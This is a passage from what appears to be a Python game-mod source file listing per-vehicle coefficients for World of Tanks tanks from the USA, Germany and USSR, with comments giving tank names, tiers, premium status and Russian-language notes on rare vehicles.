4975825100, # 7969 
usa_A32_M12 lvl:7 coeff:0.83 '2590069638' : 4196479000, # 7457 usa_A37_M40M43 lvl:8 coeff:0.7 '5613264774' : 4136529300, # 16161 usa_A88_M53_55 lvl:9 coeff:0.69 '2945739654' : 4795976000, # 8481 usa_A38_T92 lvl:10 coeff:0.8 # lightTank # '20017900422': None, #57633 usa_A112_T71E2 lvl:7 coeff:0.0 !!!!PREMIUM https://premomer.org/tank.php?id=57633 #T71 CMCD P, только КИТАЙ # mediumTank # '19395477894': None, #55841 usa_A95_T95_E6 lvl:10 coeff:0.0 !!!!PREMIUM https://premomer.org/tank.php?id=55841 # T95E6 за глобалку # heavyTank # '21351662982': None, #61473 usa_A126_PzVI_Tiger_II_capt lvl:7 coeff:0.0 !!!!PREMIUM https://premomer.org/tank.php?id=61473 #King Tiger (захваченный), TwichPrime # '20640322950': None, #59425 usa_A13_T34_hvy_BF lvl:8 coeff:0.0 !!!!PREMIUM https://premomer.org/tank.php?id=59425 #T34 Черный # '20907075462': None, #60193 usa_A115_Chrysler_K lvl:8 coeff:0.0 !!!!PREMIUM https://premomer.org/tank.php?id=60193 #Chrysler K # '21529497990': None, #61985 usa_A124_T54E2 lvl:8 coeff:0.0 !!!!PREMIUM https://premomer.org/tank.php?id=61985 #M54 Renegade }) self.p__COEFFICIENTS.update({ # germany # lightTank '1072914726' : 7859405670, # 3089 germany_G12_Ltraktor lvl:1 coeff:1.311 '717244710' : 6535716294, # 2065 germany_G06_PzII lvl:2 coeff:1.0902 '272657190' : 6552502210, # 785 germany_G07_Pz35t lvl:2 coeff:1.093 '18233992998': 5994970000, # 52497 germany_G33_H39_captured lvl:2 coeff:1.0 !!!!PREMIUM '20990435622': 7193964000, # 60433 germany_G108_PzKpfwII_AusfD lvl:2 coeff:1.2 !!!!PREMIUM '4451779878' : 7493712500, # 12817 germany_G53_PzI lvl:2 coeff:1.25 '16544560422': 7193964000, # 47633 germany_G139_MKA lvl:2 coeff:1.2 !!!!PREMIUM '1695337254' : 6504542450, # 4881 germany_G102_Pz_III lvl:3 coeff:1.085 '4362862374' : 5994970000, # 12561 germany_G63_PzI_ausf_C lvl:3 coeff:1.0 '1161832230' : 5917035390, # 3345 germany_G08_Pz38t lvl:3 coeff:0.987 '17967240486': 7193964000, # 51729 germany_G36_PzII_J lvl:3 coeff:1.2 !!!!PREMIUM '4540697382' : 5994970000, # 13073 germany_G82_Pz_II_AusfG lvl:3 coeff:1.0 '19034250534': 8992455000, # 54801 germany_G50_T-15 lvl:3 coeff:1.5 !!!!PREMIUM '22057445670': 7791662509, # 63505 germany_G117_Toldi_III lvl:3 coeff:1.2997 !!!!PREMIUM '2851264806' : 6312703410, # 8209 germany_G52_Pz38_NA lvl:4 coeff:1.053 '2139924774' : 6294718500, # 6161 germany_G25_PzII_Luchs lvl:4 coeff:1.05 '1873172262' : 6114869400, # 5393 germany_G26_VK1602 lvl:5 coeff:1.02 '3473687334' : 4945850250, # 10001 germany_G66_VK2801 lvl:6 coeff:0.825 '6585799974' : 4676076600, # 18961 germany_G113_SP_I_C lvl:7 coeff:0.78 '4985284902' : 8392958000, # 14353 germany_G85_Auf_Panther lvl:7 coeff:1.4 '7030387494' : 4076579600, # 20241 germany_G126_HWK_12 lvl:8 coeff:0.68 '22235280678': 8392958000, # 64017 germany_G120_M41_90 lvl:8 coeff:1.4 !!!!PREMIUM '17700487974': 8392958000, # 50961 germany_G120_M41_90_GrandFinal lvl:8 coeff:1.4 !!!!PREMIUM '16455642918': 8992455000, # 47377 germany_G140_HWK_30 lvl:8 coeff:1.5 !!!!PREMIUM '6407964966' : 4016629900, # 18449 germany_G103_RU_251 lvl:9 coeff:0.67 '6941469990' : 3956680200, # 19985 germany_G125_Spz_57_Rh lvl:10 coeff:0.66 # mediumTank '18056157990': 7553662200, # 51985 germany_G34_S35_captured lvl:3 coeff:1.26 !!!!PREMIUM '20723683110': 7313863400, # 59665 germany_G100_Gtraktor_Krupp lvl:3 coeff:1.22 !!!!PREMIUM '5963377446' : 5994970000, # 17169 germany_G83_Pz_IV_AusfA lvl:3 coeff:1.0 '4718532390' : 6594467000, # 13585 germany_G86_VK2001DB lvl:4 coeff:1.1 '1517502246' : 6768321130, # 4369 germany_G10_PzIII_AusfJ lvl:4 coeff:1.129 
'6052294950' : 6294718500, # 17425 germany_G80_Pz_IV_AusfD lvl:4 coeff:1.05 '17878322982': 8872555600, # 51473 germany_G32_PzV_PzIV lvl:5 coeff:1.48 !!!!PREMIUM '18945333030': 9112354400, # 54545 germany_G46_T-25 lvl:5 coeff:1.52 !!!!PREMIUM '2228842278' : 7002124960, # 6417 germany_G28_PzIII_IV lvl:5 coeff:1.168 '19123168038': 8392958000, # 55057 germany_G70_PzIV_Hydro lvl:5 coeff:1.4 !!!!PREMIUM '6319047462' : 6594467000, # 18193 germany_G81_Pz_IV_AusfH lvl:5 coeff:1.1 '21346105638': 8392958000, # 61457 germany_G107_PzKpfwIII_AusfK lvl:5 coeff:1.4 !!!!PREMIUM '21968528166': 8392358503, # 63249 germany_G116_Turan_III_prot lvl:5 coeff:1.3999 !!!!PREMIUM '19923425574': 7553662200, # 57361 germany_G77_PzIV_Schmalturm lvl:6 coeff:1.26 !!!!PREMIUM '4896367398' : 5395473000, # 14097 germany_G87_VK3002DB_V1 lvl:6 coeff:0.9 '2495594790' : 6102879460, # 7185 germany_G27_VK3001P lvl:6 coeff:1.018 '5518789926' : 5095724500, # 15889 germany_G96_VK3002M lvl:6 coeff:0.85 '20012343078': 9352153200, # 57617 germany_G78_Panther_M10 lvl:7 coeff:1.56 !!!!PREMIUM '1428584742' : 4550182230, # 4113 germany_G24_VK3002DB lvl:7 coeff:0.759 '450492198' : 4825950850, # 1297 germany_G03_PzV_Panther lvl:7 coeff:0.805 '2940182310' : 4742021270, # 8465 germany_G64_Panther_II lvl:8 coeff:0.791 '20901518118': 8992455000, # 60177 germany_G106_PzKpfwPanther_AusfF lvl:8 coeff:1.5 !!!!PREMIUM '22324198182': 8992455000, # 64273 germany_G119_Pz58_Mutz lvl:8 coeff:1.5 !!!!PREMIUM '22146363174': 5994970000, # 63761 germany_G119_Panzer58 lvl:8 coeff:1.0 !!!!PREMIUM '4807449894' : 4016629900, # 13841 germany_G88_Indien_Panzer lvl:8 coeff:0.67 '3562604838' : 4670081630, # 10257 germany_G54_E-50 lvl:9 coeff:0.779 '5163119910' : 4496227500, # 14865 germany_G91_Pro_Ag_A lvl:9 coeff:0.75 '21168270630': 4795976000, # 60945 germany_G105_T-55_NVA_DDR lvl:9 coeff:0.8 !!!!PREMIUM '5074202406' : 4496227500, # 14609 germany_G89_Leopard1 lvl:10 coeff:0.75 '4273944870' : 4376328100, # 12305 germany_G73_E50_Ausf_M lvl:10 coeff:0.73 # heavyTank '18145075494': 8153159200, # 52241 germany_G35_B-1bis_captured lvl:4 coeff:1.36 !!!!PREMIUM '4629614886' : 6294718500, # 13329 germany_G90_DW_II lvl:4 coeff:1.05 '895079718' : 6594467000, # 2577 germany_G13_VK3001H lvl:5 coeff:1.1 '20634765606': 8392958000, # 59409 germany_G122_VK6501H lvl:5 coeff:1.4 !!!!PREMIUM '17078065446': 7193964000, # 49169 germany_G136_Tiger_131 lvl:6 coeff:1.2 !!!!PREMIUM '806162214' : 5581317070, # 2321 germany_G15_VK3601H lvl:6 coeff:0.931 '18322910502': 7193964000, # 52753 germany_G137_PzVI_Tiger_217 lvl:6 coeff:1.2 !!!!PREMIUM '183739686' : 5401467970, # 529 germany_G04_PzVI_Tiger_I lvl:7 coeff:0.901 '21879610662': 8992455000, # 62993 germany_G118_VK4503 lvl:7 coeff:1.5 !!!!PREMIUM '3740439846' : 4819955880, # 10769 germany_G57_PzVI_Tiger_P lvl:7 coeff:0.804 '3651522342' : 5347513240, # 10513 germany_G67_VK4502A lvl:8 coeff:0.892 '6852552486' : 4975825100, # 19729 germany_G115_Typ_205B lvl:8 coeff:0.83 '18856415526': 9891700500, # 54289 germany_G51_Lowe lvl:8 coeff:1.65 !!!!PREMIUM '1784254758' : 5119704380, # 5137 germany_G16_PzVIB_Tiger_II lvl:8 coeff:0.854 '16989147942': 8992455000, # 48913 germany_G138_VK168_02 lvl:8 coeff:1.5 !!!!PREMIUM '16722395430': 8992455000, # 48145 germany_G138_VK168_02_Mauerbrecher lvl:8 coeff:1.5 !!!!PREMIUM '19478838054': 8992455000, # 56081 germany_G141_VK7501K lvl:8 coeff:1.5 !!!!PREMIUM '16277807910': 8992455000, # 46865 germany_G143_E75_TS lvl:8 coeff:1.5 !!!!PREMIUM '6496882470' : 4556177200, # 18705 germany_G110_Typ_205 lvl:9 coeff:0.76 
'2584512294' : 4724036360, # 7441 germany_G58_VK4502P lvl:9 coeff:0.788 '3384769830' : 4514212410, # 9745 germany_G55_E-75 lvl:9 coeff:0.753 '2406677286' : 5035774800, # 6929 germany_G42_Maus lvl:10 coeff:0.84 '3295852326' : 4580157080, # 9489 germany_G56_E-100 lvl:10 coeff:0.764 '6763634982' : 4376328100, # 19473 germany_G134_PzKpfw_VII lvl:10 coeff:0.73 '20368013094': 4376328100, # 58641 germany_G92_VK7201 lvl:10 coeff:0.73 !!!!PREMIUM # AT-SPG '1250749734' : 5917035390, # 3601 germany_G21_PanzerJager_I lvl:2 coeff:0.987 '2317759782' : 5485397550, # 6673 germany_G20_Marder_II lvl:3 coeff:0.915 '6230129958' : 5095724500, # 17937 germany_G101_StuG_III lvl:4 coeff:0.85 '3918274854' : 5095724500, # 11281 germany_G39_Marder_III lvl:4 coeff:0.85 '628327206' : 5470410125, # 1809 germany_G09_Hetzer lvl:4 coeff:0.9125 '361574694' : 6021347868, # 1041 germany_G05_StuG_40_AusfG lvl:5 coeff:1.0044 '21079353126': 8992455000, # 60689 germany_G104_Stug_IV lvl:5 coeff:1.5 !!!!PREMIUM '5607707430' : 5695221500, # 16145 germany_G76_Pz_Sfl_IVc lvl:5 coeff:0.95 '19834508070': 8093209500, # 57105 germany_G41_DickerMax lvl:6 coeff:1.35 !!!!PREMIUM '539409702' : 5875070600, # 1553 germany_G17_JagdPzIV lvl:6 coeff:0.98 '4096109862' : 5695221500, # 11793 germany_G40_Nashorn lvl:6 coeff:0.95 '3829357350' : 4496227500, # 11025 germany_G43_Sturer_Emil lvl:7 coeff:0.75 '21435023142': 7793461000, # 61713 germany_G109_Steyr_WT lvl:7 coeff:1.3 !!!!PREMIUM '1339667238' : 4945850250, # 3857 germany_G18_JagdPanther lvl:7 coeff:0.825 '19301003046': 7793461000, # 55569 germany_G48_E-25 lvl:7 coeff:1.3 !!!!PREMIUM '17433735462': 8992455000, # 50193 germany_G114_Rheinmetall_Skorpian lvl:8 coeff:1.5 !!!!PREMIUM '21701775654': 8992455000, # 62481 germany_G114_Skorpian lvl:8 coeff:1.5 !!!!PREMIUM '16811312934': 8992455000, # 48401 germany_G112_KanonenJagdPanzer_105 lvl:8 coeff:1.5 !!!!PREMIUM '4007192358' : 4346353250, # 11537 germany_G71_JagdPantherII lvl:8 coeff:0.725 '5785542438' : 4316378400, # 16657 germany_G99_RhB_Waffentrager lvl:8 coeff:0.72 '19212085542': 9292203500, # 55313 germany_G65_JagdTiger_SdKfz_185 lvl:8 coeff:1.55 !!!!PREMIUM '21523940646': 8992455000, # 61969 germany_G112_KanonenJagdPanzer lvl:8 coeff:1.5 !!!!PREMIUM '2673429798' : 4346353250, # 7697 germany_G37_Ferdinand lvl:8 coeff:0.725 '5696624934' : 4196479000, # 16401 germany_G97_Waffentrager_IV lvl:9 coeff:0.7 '2762347302' : 4076579600, # 7953 germany_G44_JagdTiger lvl:9 coeff:0.68 '5874459942' : 3596982000, # 16913 germany_G98_Waffentrager_E100 lvl:10 coeff:0.6 '4185027366' : 3950685230, # 12049 germany_G72_JagdPz_E100 lvl:10 coeff:0.659 '6674717478' : 3596982000, # 19217 germany_G121_Grille_15_L63 lvl:10 coeff:0.6 # SPG '5252037414' : 7973310100, # 15121 germany_G93_GW_Mk_VIe lvl:2 coeff:1.33 '983997222' : 7074064600, # 2833 germany_G11_Bison_I lvl:3 coeff:1.18 '2051007270' : 6474567600, # 5905 germany_G19_Wespe lvl:3 coeff:1.08 '1606419750' : 7074064600, # 4625 germany_G22_Sturmpanzer_II lvl:4 coeff:1.18 '5429872422' : 6174819100, # 15633 germany_G95_Pz_Sfl_IVb lvl:4 coeff:1.03 '1962089766' : 6714366400, # 5649 germany_G23_Grille lvl:5 coeff:1.12 '94822182' : 7014114900, # 273 germany_G02_Hummel lvl:6 coeff:1.17 '3118017318' : 5095724500, # 8977 germany_G49_G_Panther lvl:7 coeff:0.85 '5340954918' : 4676076600, # 15377 germany_G94_GW_Tiger_P lvl:8 coeff:0.78 '3029099814' : 4196479000, # 8721 germany_G45_G_Tiger lvl:9 coeff:0.7 '3206934822' : 4915875400, # 9233 germany_G61_G_E lvl:10 coeff:0.82 # lightTank # '16633477926': None, #47889 
germany_G85_Aufklarungspanzer_V lvl:8 coeff:0.0 !!!!PREMIUM https://premomer.org/tank.php?id=47889 #Aufklrungspanzer V, в разработке # mediumTank # '18767498022': None, #54033 germany_G32_PzV_PzIV_ausf_Alfa lvl:5 coeff:0.0 !!!!PREMIUM https://premomer.org/tank.php?id=54033 #Pz.Kpfw. V/IV Alpha, Выдавался Альфа тестерам # '16188890406': None, #46609 germany_G142_M48RPz lvl:8 coeff:0.0 !!!!PREMIUM https://premomer.org/tank.php?id=46609 #M48A2 Rumpanzer Паттон с ковшом # '17344817958': None, #49937 germany_G119_Panzer58_BF lvl:8 coeff:0.0 !!!!PREMIUM https://premomer.org/tank.php?id=49937 #Schwarzpanzer 58 # '16366725414': None, #47121 germany_G144_Kpz_50t lvl:9 coeff:0.0 !!!!PREMIUM https://premomer.org/tank.php?id=47121 #Kampfpanzer 50 t, Награда за ранговые бои 2019 # heavyTank # '21612858150': None, #62225 germany_G58_VK4502P7 lvl:7 coeff:0.0 !!!!PREMIUM https://premomer.org/tank.php?id=62225 #VK 45.02 (P) Ausf. B7, Этого танка нет ни у кого # '17255900454': None, #49681 germany_G16_PzVIB_Tiger_II_F lvl:7 coeff:0.0 !!!!PREMIUM https://premomer.org/tank.php?id=49681 #Tiger II (H), Этого танка нет ни у кого # '21790693158': None, #62737 germany_G115_Typ_205_4_Jun lvl:8 coeff:0.0 !!!!PREMIUM https://premomer.org/tank.php?id=62737 #VK 100.01 (P) Ausf. B, только КИТАЙ # AT-SPG # '17166982950': None, #49425 germany_G44_JagdTigerH lvl:8 coeff:0.0 !!!!PREMIUM https://premomer.org/tank.php?id=49425 #Jagdtiger (H), Этого танка нет ни у кого # '16900230438': None, #48657 germany_G98_Waffentrager_E100_P lvl:10 coeff:0.0 !!!!PREMIUM https://premomer.org/tank.php?id=48657 #Waffentrger auf E 100 (P), только КИТАЙ }) self.p__COEFFICIENTS.update({ # ussr # lightTank '1156274886' : 5503382460, # 3329 ussr_R11_MS-1 lvl:1 coeff:0.918 #changed in 1.9 #fixed '356017350' : 5695221500, # 1025 ussr_R08_BT-2 lvl:2 coeff:0.95 #changed in 1.9 #fixed '14404982982': 10491197500, # 41473 ussr_R86_LTP_bootcamp lvl:2 coeff:1.75 '5335397574' : 4915875400, # 15361 ussr_R42_T-60 lvl:2 coeff:0.82 #changed in 1.9 #fixed '1600862406' : 5347513240, # 4609 ussr_R09_T-26 lvl:2 coeff:0.892 #changed in 1.9 #fixed '18939775686': 6534517300, # 54529 ussr_R84_Tetrarch_LL lvl:2 coeff:1.09 !!!!PREMIUM # '17694930630': None, #50945 ussr_R125_T_45 lvl:2 coeff:0.0 !!!!PREMIUM '1067357382' : 5011794920, # 3073 ussr_R22_T-46 lvl:3 coeff:0.836 #changed in 1.9 #fixed '267099846' : 5845095750, # 769 ussr_R03_BT-7 lvl:4 coeff:0.975 #changed in 1.9 #fixed '18317353158': 9591952000, # 52737 ussr_R67_M3_LL lvl:3 coeff:1.6 !!!!PREMIUM '21162713286': 7793461000, # 60929 ussr_R105_BT_7A lvl:3 coeff:1.3 !!!!PREMIUM '5246480070' : 5095724500, # 15105 ussr_R43_T-70 lvl:3 coeff:0.85 #changed in 1.9 #fixed '18584105670': 7880388065, # 53505 ussr_R56_T-127 lvl:3 coeff:1.3145 !!!!PREMIUM '18139518150': 7793461000, # 52225 ussr_R34_BT-SV lvl:3 coeff:1.3 !!!!PREMIUM # '19651115718': None, #56577 ussr_R86_LTP lvl:3 coeff:0.0 !!!!PREMIUM # '15560910534': None, #44801 ussr_R161_T_116 lvl:3 coeff:0.0 !!!!PREMIUM # '711687366' : 5917035390, # 2049 ussr_R12_A-20 lvl:5 coeff:0.987 #changed in 1.9 #fixed '18228435654': 9442077750, # 52481 ussr_R31_Valentine_LL lvl:4 coeff:1.575 !!!!PREMIUM '5513232582' : 6114869400, # 15873 ussr_R44_T80 lvl:4 coeff:1.02 #changed in 1.9 #fixed '3379212486' : 8392958000, # 9729 ussr_R70_T_50_2 lvl:5 coeff:1.4 '3290294982' : 5779151080, # 9473 ussr_R41_T-50 lvl:5 coeff:0.964 #changed in 1.9 #fixed '5779985094' : 4975825100, # 16641 ussr_R101_MT25 lvl:6 coeff:0.83 #changed in 1.9 #fixed # '15738745542': None, #45313 ussr_R160_T_50_2 lvl:6 
coeff:0.0 !!!!PREMIUM #changed in 1.9 #not fixed '6758077638' : 4676076600, # 19457 ussr_R131_Tank_Gavalov lvl:7 coeff:0.78 '15827663046': 8992455000, # 45569 ussr_R158_LT_432 lvl:8 coeff:1.5 !!!!PREMIUM '6402407622' : 4076579600, # 18433 ussr_R107_LTB lvl:8 coeff:0.68 '6313490118' : 4016629900, # 18177 ussr_R109_T54S lvl:9 coeff:0.67 '6669160134' : 3956680200, # 19201 ussr_R132_VNII_100LT lvl:10 coeff:0.66 # mediumTank '16627920582': 7793461000, # 47873 ussr_R143_T_29 lvl:3 coeff:1.3 !!!!PREMIUM '18406270662': 8614771890, # 52993 ussr_R68_A-32 lvl:4 coeff:1.437 !!!!PREMIUM '533852358' : 5976985090, # 1537 ussr_R06_T-28 lvl:4 coeff:0.997 #changed in 1.9 #fixed '21340548294': 9112354400, # 61441 ussr_R118_T28_F30 lvl:4 coeff:1.52 !!!!PREMIUM '347334' : 6558497180, # 1 ussr_R04_T-34 lvl:5 coeff:1.094 #changed in 1.9 #fixed '17872765638': 8992455000, # 51457 ussr_R32_Matilda_II_LL lvl:5 coeff:1.5 !!!!PREMIUM '16361168070': 8692706500, # 47105 ussr_R154_T_34E_1943 lvl:5 coeff:1.45 !!!!PREMIUM '20184620742': 7313863400, # 58113 ussr_R108_T34_85M lvl:6 coeff:1.22 !!!!PREMIUM '4268387526' : 4975825100, # 12289 ussr_R57_A43 lvl:6 coeff:0.83 #changed in 1.9 #fixed '889522374' : 5431442820, # 2561 ussr_R07_T-34-85 lvl:6 coeff:0.906 #changed in 1.9 #fixed '20629208262': 7493712500, # 59393 ussr_R117_T34_85_Rudy lvl:6 coeff:1.25 !!!!PREMIUM # '16716838086': None, #48129 ussr_R140_M4_Loza lvl:6 coeff:0.0 !!!!PREMIUM '19828950726': 7493712500, # 57089 ussr_R98_T44_85 lvl:7 coeff:1.25 !!!!PREMIUM '3112459974' : 5563332160, # 8961 ussr_R46_KV-13 lvl:7 coeff:0.928 '2312202438' : 5143684260, # 6657 ussr_R23_T-43 lvl:7 coeff:0.858 '4357305030' : 4616126900, # 12545 ussr_R59_A44 lvl:7 coeff:0.77 '4624057542' : 4016629900, # 13313 ussr_R60_Object416 lvl:8 coeff:0.67 '16539003078': 8992455000, # 47617 ussr_R146_STG lvl:8 coeff:1.5 !!!!PREMIUM '20807043270': 8992455000, # 59905 ussr_R112_T54_45 lvl:8 coeff:1.5 !!!!PREMIUM '21518383302': 8992455000, # 61953 ussr_R122_T44_100 lvl:8 coeff:1.5 !!!!PREMIUM '16450085574': 8992455000, # 47361 ussr_R146_STG_Tday lvl:8 coeff:1.5 !!!!PREMIUM '16983590598': 8992455000, # 48897 ussr_R122_T44_100B lvl:8 coeff:1.5 !!!!PREMIUM '16094415558': 8992455000, # 46337 ussr_R127_T44_100_U lvl:8 coeff:1.5 !!!!PREMIUM '21874053318': 8992455000, # 62977 ussr_R127_T44_100_P lvl:8 coeff:1.5 !!!!PREMIUM '16005498054': 8992455000, # 46081 ussr_R127_T44_100_K lvl:8 coeff:1.5 !!!!PREMIUM '1511944902' : 4807965940, # 4353 ussr_R20_T-44 lvl:8 coeff:0.802 '6135655110' : 4496227500, # 17665 ussr_R104_Object_430_II lvl:9 coeff:0.75 '2756789958' : 4915875400, # 7937 ussr_R40_T-54 lvl:9 coeff:0.82 '7558335174' : 4376328100, # 21761 ussr_R144_K_91 lvl:10 coeff:0.73 '5957820102' : 4376328100, # 17153 ussr_R96_Object_430B lvl:10 coeff:0.73 '4801892550' : 4676076600, # 13825 ussr_R87_T62A lvl:10 coeff:0.78 '5424315078' : 4376328100, # 15617 ussr_R95_Object_907 lvl:10 coeff:0.73 !!!!PREMIUM # '7469417670': None, #21505 ussr_R96_Object_430 lvl:9 coeff:0.0 '5868902598' : 4915875400, # 16897 ussr_R97_Object_140 lvl:10 coeff:0.82 '6935912646' : 4376328100, # 19969 ussr_R148_Object_430_U lvl:10 coeff:0.73 # heavyTank '6491325126' : 5467412640, # 18689 ussr_R13_KV-1s lvl:6 coeff:0.912 #changed in 1.9 #fixed '18761940678': 8832988798, # 54017 ussr_R38_KV-220 lvl:5 coeff:1.4734 !!!!PREMIUM '17961683142': 9442077750, # 51713 ussr_R33_Churchill_LL lvl:5 coeff:1.575 !!!!PREMIUM '4090552518' : 5994970000, # 11777 ussr_R80_KV1 lvl:5 coeff:1.0 #changed in 1.9 #fixed '3912717510' : 5527362340, # 11265 ussr_R72_T150 
lvl:6 coeff:0.922 #changed in 1.9 #fixed '978439878' : 3495067510, # 2817 ussr_R106_KV85 lvl:6 coeff:0.583 #changed in 1.9 #fixed '3645964998' : 5203633960, # 10497 ussr_R77_KV2 lvl:6 coeff:0.868 #changed in 1.9 #fixed # '20895960774': None, #60161 ussr_R114_Object_244 lvl:6 coeff:0.0 !!!!PREMIUM # '22496475846': None, #64769 ussr_R152_KV2_W lvl:6 coeff:0.0 !!!!PREMIUM '17339260614': 8992455000, # 49921 ussr_R133_KV_122 lvl:7 coeff:1.5 !!!!PREMIUM '20540290758': 8093209500, # 59137 ussr_R71_IS_2B lvl:7 coeff:1.35 !!!!PREMIUM '16183333062': 8093209500, # 46593 ussr_R156_IS_2M lvl:7 coeff:1.35 !!!!PREMIUM '178182342' : 5605296950, # 513 ussr_R01_IS lvl:7 coeff:0.935 '2045449926' : 5359503180, # 5889 ussr_R39_KV-3 lvl:7 coeff:0.894 '3201377478' : 8992455000, # 9217 ussr_R61_Object252 lvl:8 coeff:1.5 !!!!PREMIUM '21962970822': 8992455000, # 63233 ussr_R128_KV4_Kreslavskiy lvl:8 coeff:1.5 !!!!PREMIUM '16894673094': 8992455000, # 48641 ussr_R134_Object_252K lvl:8 coeff:1.5 !!!!PREMIUM '17250343110': 8992455000, # 49665 ussr_R134_Object_252U lvl:8 coeff:1.5 !!!!PREMIUM '7113747654' : 4795976000, # 20481 ussr_R139_IS_M lvl:8 coeff:0.8 '20451373254': 8992455000, # 58881 ussr_R113_Object_730 lvl:8 coeff:1.5 !!!!PREMIUM '3823800006' : 5527362340, # 11009 ussr_R73_KV4 lvl:8 coeff:0.922 '1867614918' : 4777991090, # 5377 ussr_R19_IS-3 lvl:8 coeff:0.797 '21785135814': 8992455000, # 62721 ussr_R123_Kirovets_1 lvl:8 coeff:1.5 !!!!PREMIUM '18495188166': 8992455000, # 53249 ussr_R54_KV-5 lvl:8 coeff:1.5 !!!!PREMIUM '20984878278': 8992455000, # 60417 ussr_R115_IS-3_auto lvl:8 coeff:1.5 !!!!PREMIUM '6846995142' : 4616126900, # 19713 ussr_R151_Object_257_2 lvl:9 coeff:0.77 '7202665158' : 4616126900, # 20737 ussr_R153_Object_705 lvl:9 coeff:0.77 '3734882502' : 4532197320, # 10753 ussr_R63_ST_I lvl:9 coeff:0.756 '4001635014' : 4658091690, # 11521 ussr_R81_IS8 lvl:9 coeff:0.777 '2134367430' : 4694061510, # 6145 ussr_R90_IS_4M lvl:10 coeff:0.783 '2490037446' : 4724036360, # 7169 ussr_R45_IS-7 lvl:10 coeff:0.788 '7291582662' : 4376328100, # 20993 ussr_R145_Object_705_A lvl:10 coeff:0.73 '7647252678' : 4376328100, # 22017 ussr_R155_Object_277 lvl:10 coeff:0.73 '20273538246': 4196479000, # 58369 ussr_R110_Object_260 lvl:10 coeff:0.7 !!!!PREMIUM '16272250566': 4196479000, # 46849 ussr_R157_Object_279R lvl:10 coeff:0.7 !!!!PREMIUM # '7914005190': None, #22785 ussr_R170_IS_2_II lvl:8 coeff:0.0 https://premomer.org/tank.php?id=22785 #Двустволка8 '15383075526': 8992455000, # 44289 ussr_R165_Object_703_II lvl:8 coeff:1.5 !!!!PREMIUM # '7825087686': None, #22529 ussr_R171_IS_3_II lvl:9 coeff:0.0 https://premomer.org/tank.php?id=22529 #Двустволка9 # '7736170182': None, #22273 ussr_R169_ST_II lvl:10 coeff:0.0 https://premomer.org/tank.php?id=22273 #Двустволка10 # AT-SPG '1778697414' : 5779151080, # 5121 ussr_R10_AT-1 lvl:2 coeff:0.964 #changed in 1.9 #fixed '14493900486': 10491197500, # 41729 ussr_R50_SU76I_bootcamp lvl:2 coeff:1.75 '18850858182': 7193964000, # 54273 ussr_R50_SU76I lvl:3 coeff:1.2 !!!!PREMIUM '2223284934' : 4766001150, # 6401 ussr_R24_SU-76 lvl:4 coeff:0.795 #changed in 1.9 #fixed '2401119942' : 4340358280, # 6913 ussr_R25_GAZ-74b lvl:4 coeff:0.724 #changed in 1.9 #fixed '18673023174': 7793461000, # 53761 ussr_R78_SU_85I lvl:5 coeff:1.3 !!!!PREMIUM #changed in 1.9 #not fixed '89264838' : 5845095750, # 257 ussr_R02_SU-85 lvl:5 coeff:0.975 #changed in 1.9 #fixed '19028693190': 8572807100, # 54785 ussr_R49_SU100Y lvl:6 coeff:1.43 !!!!PREMIUM '1245192390' : 5119704380, # 3585 ussr_R17_SU-100 lvl:6 coeff:0.854 
#changed in 1.9 #fixed '800604870' : 5077739590, # 2305 ussr_R18_SU-152 lvl:7 coeff:0.847 '3557047494' : 4316378400, # 10241 ussr_R74_SU100M1 lvl:7 coeff:0.72 '20718125766': 8093209500, # 59649 ussr_R116_ISU122C_Berlin lvl:7 coeff:1.35 !!!!PREMIUM '19206528198': 8632756800, # 55297 ussr_R89_SU122_44 lvl:7 coeff:1.44 !!!!PREMIUM '3468129990' : 4783986060, # 9985 ussr_R58_SU-101 lvl:8 coeff:0.798 '16805755590': 8992455000, # 48385 ussr_R135_T_103 lvl:8 coeff:1.5 !!!!PREMIUM '20362455750': 5994970000, # 58625 ussr_R111_ISU130 lvl:8 coeff:1.0 !!!!PREMIUM '2578954950' : 4262423670, # 7425 ussr_R47_ISU-152 lvl:8 coeff:0.711 # '15649828038': None, #45057 ussr_R159_SU_130PM lvl:8 coeff:0.0 !!!!PREMIUM '2845707462' : 3716881400, # 8193 ussr_R53_Object_704 lvl:9 coeff:0.62 '4179470022' : 4208468940, # 12033 ussr_R75_SU122_54 lvl:9 coeff:0.702 # '7380500166': None, #21249 ussr_R93_Object263 lvl:9 coeff:0.0 '4979727558' : 3794816010, # 14337 ussr_R93_Object263B lvl:10 coeff:0.633 '7024830150' : 3776831100, # 20225 ussr_R149_Object_268_4 lvl:10 coeff:0.63 '4712975046' : 3626956850, # 13569 ussr_R88_Object268 lvl:10 coeff:0.605 # SPG '1334109894' : 5875070600, # 3841 ussr_R16_SU-18 lvl:2 coeff:0.98 #changed in 1.9 #fixed '2667872454' : 5779151080, # 7681 ussr_R66_SU-26 lvl:3 coeff:0.964 #changed in 1.9 #fixed '1689779910' : 6258748680, # 4865 ussr_R14_SU-5 lvl:4 coeff:1.044 #changed in 1.9 #fixed '5691067590' : 6714366400, # 16385 ussr_R100_SU122A lvl:5 coeff:1.12 #changed in 1.9 #fixed '1956532422' : 5994970000, # 5633 ussr_R26_SU-8 lvl:6 coeff:1.0 #changed in 1.9 #fixed '5602150086' : 5665246650, # 16129 ussr_R91_SU14_1 lvl:7 coeff:0.945 '622769862' : 5605296950, # 1793 ussr_R15_S-51 lvl:7 coeff:0.935 '1423027398' : 4676076600, # 4097 ussr_R27_SU-14 lvl:8 coeff:0.78 '2934624966' : 4076579600, # 8449 ussr_R51_Object_212 lvl:9 coeff:0.68 '3023542470' : 4556177200, # 8705 ussr_R52_Object_261 lvl:10 coeff:0.76 # lightTank # '19917868230': None, #57345 ussr_R98_T44_85M lvl:8 coeff:0.0 !!!!PREMIUM https://premomer.org/tank.php?id=57345 #Прошел тесты, но по каким-то причинам выпущен не был # mediumTank # '19740033222': None, #56833 ussr_R99_T44_122 lvl:7 coeff:0.0 !!!!PREMIUM https://premomer.org/tank.php?id=56833 #Выдается Супер тестерам # '21073795782': None, #60673 ussr_R95_Object_907A lvl:10 coeff:0.0 !!!!PREMIUM https://premomer.org/tank.php?id=60673 #Эксклюзив 100%, только КИТАЙ # '21429465798': None, #61697 ussr_R120_T22SR_A22 lvl:10 coeff:0.0 !!!!PREMIUM https://premomer.org/tank.php?id=61697 #Награда за боевые задачи в рамках боёв в режиме "Бой до последнего" # heavyTank # '17783848134': None, #51201 ussr_R38_KV-220_beta lvl:5 coeff:0.0 !!!!PREMIUM https://premomer.org/tank.php?id=51201 #Выдавался Бэта-тестерам # '10670447814': None, #30721 ussr_R165_Object_703_II_2 lvl:8 coeff:0.0 !!!!PREMIUM https://premomer.org/tank.php?id=30721 #Этого танка нет ни у 